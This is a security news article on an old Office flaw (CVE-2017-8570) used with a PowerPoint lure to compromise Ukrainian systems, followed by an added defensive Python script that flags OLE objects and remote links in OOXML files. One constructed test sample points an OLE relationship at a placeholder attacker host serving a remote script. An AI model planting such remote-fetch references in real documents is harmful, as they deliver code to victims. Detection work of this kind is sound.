Network Security, Vulnerability Management, Threat Intelligence

Old Microsoft Office bug leveraged to compromise Ukraine


Ukrainian systems were targeted late last year in attacks that exploited an almost seven-year-old Microsoft Office remote code execution vulnerability, tracked as CVE-2017-8570, to deploy Cobalt Strike, The Hacker News reports.

The intrusions began with a PowerPoint file, an old U.S. Army mine-clearing blade manual believed to have been shared through the Signal instant messaging app, that carried a script exploiting the high-severity Office flaw, according to a report from Deep Instinct. That script loads an HTML file containing JavaScript, which both establishes persistence and delivers a payload masquerading as the Cisco AnyConnect VPN client, ending in a Cobalt Strike compromise.
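As an added example, not part of the SC Media article or of Deep Instinct's research: a small Python triage routine for lure documents of the kind described above. OOXML presentations (pptx/ppsx) are zip packages, so the two things a responder wants to know first can be read without Office at all: whether the package carries an embedded OLE object (the component that CVE-2017-8570 exploits abuse), which appears as a part under ppt/embeddings/ referenced by an oleObject relationship, and whether any relationship points at a remote target (TargetMode="External" or an http(s) URL). The sample packages, the attacker.example URL and the part names below are constructed for the demonstration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship type for embedded OLE objects, and the namespace of .rels parts.
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
IMAGE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def triage_ooxml(data: bytes) -> dict:
    """Collect indicators from an OOXML package (pptx/ppsx/docx/xlsx bytes).

    Returns three lists: embedded OLE parts, oleObject relationships
    (part, target, TargetMode), and relationships that resolve remotely.
    """
    findings = {"embedded_ole": [], "ole_relationships": [], "external_targets": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            low = name.lower()
            # Embedded objects live under <part>/embeddings/*.bin
            if "/embeddings/" in low and low.endswith(".bin"):
                findings["embedded_ole"].append(name)
            # Every .rels part lists the relationships of one package part
            if low.endswith(".rels"):
                root = ET.fromstring(z.read(name))
                for rel in root.iter(REL_NS + "Relationship"):
                    rtype = rel.get("Type", "")
                    target = rel.get("Target", "")
                    mode = rel.get("TargetMode", "Internal")
                    if rtype == OLE_REL:
                        findings["ole_relationships"].append((name, target, mode))
                    if mode == "External" or target.lower().startswith(("http://", "https://")):
                        findings["external_targets"].append((name, target))
    return findings


def is_suspicious(findings: dict) -> bool:
    """Heuristic verdict: any OLE object or remote relationship warrants a closer look."""
    return bool(findings["embedded_ole"] or findings["ole_relationships"] or findings["external_targets"])


def build_sample(kind: str) -> bytes:
    """Constructed minimal packages for testing (not real lures).

    'benign'   -> slide with an internal image relationship only
    'embedded' -> slide referencing an embedded OLE object part
    'external' -> slide whose OLE relationship points at a remote URL
    """
    head = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')
    if kind == "benign":
        rels = head + '<Relationship Id="rId1" Type="%s" Target="../media/image1.png"/></Relationships>' % IMAGE_REL
    elif kind == "embedded":
        rels = head + '<Relationship Id="rId1" Type="%s" Target="../embeddings/oleObject1.bin"/></Relationships>' % OLE_REL
    elif kind == "external":
        # attacker.example is a placeholder host, not an indicator from the reported campaign
        rels = head + ('<Relationship Id="rId1" Type="%s" Target="http://attacker.example/stage1.sct" '
                       'TargetMode="External"/></Relationships>' % OLE_REL)
    else:
        raise ValueError(kind)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("ppt/slides/slide1.xml",
                   '<?xml version="1.0"?><p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"/>')
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
        if kind == "embedded":
            # OLE2 compound-file magic followed by padding: a stub, not a working object
            z.writestr("ppt/embeddings/oleObject1.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


if __name__ == "__main__":
    for kind in ("benign", "embedded", "external"):
        f = triage_ooxml(build_sample(kind))
        print(kind, "suspicious" if is_suspicious(f) else "clean", f)
```

Treat the result as a triage signal, not a verdict: legitimate decks embed OLE objects (charts, spreadsheets) all the time, but an OLE relationship whose target is a remote script, in a file that arrived over a messaging app, is exactly the pattern worth pulling into a sandbox before anyone opens it.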

Attribution remains uncertain: while the lures appear aimed at military personnel, the attackers used domains unrelated to the military sector, the researchers noted. The findings follow a report from Ukraine's Computer Emergency Response Team detailing attacks by a sub-cluster of the Russian state-backed threat group Sandworm against almost 20 critical infrastructure entities across the country.
